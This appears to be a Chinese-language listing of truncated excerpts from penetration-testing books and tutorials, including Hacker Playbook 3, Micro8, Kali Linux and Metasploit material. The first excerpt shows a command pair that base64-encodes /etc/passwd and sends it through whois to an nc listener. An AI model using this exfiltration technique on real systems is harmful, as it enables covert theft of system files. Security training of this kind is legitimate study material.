利用whois传输文件： 传输机： root@john :~# whois - h 127.0 . 0.1 - p 4444 `cat /etc/passwd | base64` 接受机： root@john :/ tmp # nc -l -v -p 4444 | sed "s/ //g" | base64 -d ...

介绍 渗透测试团队与红队 总结 介绍 译者：@Snowming 在本书的上一版本（The Hacker Playbook 2）中，你的任务是渗透 SUCK 公司的武器设备库。然而他们现在又建立了新的部门，称之为 Cyber Space Kittens （CSK）。这个新部门吸取了之前安全评估的所有经验教训，加强了他们的系统，建立了本...

[译] 渗透测试实战第三版(红队版) 阅读及 PDF 下载 免责声明 译者的话 阅读建议 对于本书的一些想法 关于译文中的错误处理 特别感谢 协议 [译] 渗透测试实战第三版(红队版) 译者：Snowming （雪茗） 时间：北京时间 2019-03-17 本书英文名：The Hacker Playbook 3 阅读及 ...

1. auxiliary/admin/mssql/mssql_enum 2.auxiliary/admin/mssql/mssql_enum_sql_logins 3.auxiliary/admin/mssql/mssql_escalate_dbowner 4.auxiliary/admin/mssql/mssql_exec 5.auxiliary/...

6.2 Metasploit基础 6.2.1 Metasploit的图形管理工具Armitage 6.2.2 控制Metasploit终端（MSFCONSOLE） 6.2.3 控制Metasploit命令行接口（MSFCLI） 6.2 Metasploit基础 Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题，验证漏...

大学霸 Kali Linux 安全渗透教程 大学霸 Kali Linux 安全渗透教程 作者：大学霸 原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/index.html

关于作者 关于作者 译者：@Snowming 作者 Peter Kim 从事信息安全行业超过14年，在渗透测试/红队领域工作超过12年。 他曾服务于多家公用事业公司、财富1000娱乐公司、政府机构以及大型金融机构。虽然他最为知名的是一书系列，但他却热衷于建立一个“安全”的安全社区，指导学生并培训他人。他创立并维护着南加州最大的一家技术安...

非常遗憾，停止更新。愿每一个安全从业者静有所思。——2019.3.7 为什么要写 Micro8 系列 读者及对象 声明 勘误及支持 致谢 非常遗憾，停止更新。愿每一个安全从业者静有所思。——2019.3.7 为什么要写 Micro8 系列 渗透攻击超十年，由于年龄，身体原因，自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写...

第四季是一个过渡季，过渡后门在对抗升级中由传统后门，衍生成锁定目标的制定后门。引用百度百科的“后门程序”的相关解释： https://baike.baidu.com/item/%E5%90%8E%E9%97%A8%E7%A8%8B%E5%BA%8F/108154 安全从业人员，其实至少一直在与传统后门对抗，比如最常见的webshell免杀与w...

第4章　信息收集 第4章　信息收集 渗透测试最重要的阶段之一就是信息收集。为了启动渗透测试，用户需要收集关于目标主机的基本信息。用户得到的信息越多，渗透测试成功的概率也就越高。Kali Linux操作系统上提供了一些工具，可以帮助用户整理和组织目标主机的数据，使用户得到更好的后期侦察。本章将介绍Maltego、CaseFile和Nmap工具的使用其主...